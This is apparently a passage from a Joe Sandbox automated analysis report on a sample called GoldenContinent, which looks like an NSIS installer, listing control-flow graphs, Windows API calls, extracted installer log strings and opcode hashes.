                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 310444273-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                            • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                            • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                            • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                            • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                            • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                            • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                            • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                            • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                            • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                            • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                            • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                            • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                            • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                            • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                            • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                            • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                            • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                            • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                            • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                            • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                            • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                            • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                            • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                            • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                            • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                            • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                              • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                            • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                            • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                            • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                            • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                                                            • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                            • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,WesternJpg,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,WesternJpg,WesternJpg,00000000,00000000,WesternJpg,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00429E6D,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00429E6D,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00429E6D,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                            • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$WesternJpg
                                                                                                                                                                                                                                                                            • API String ID: 4286501637-2353217261
                                                                                                                                                                                                                                                                            • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                            • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
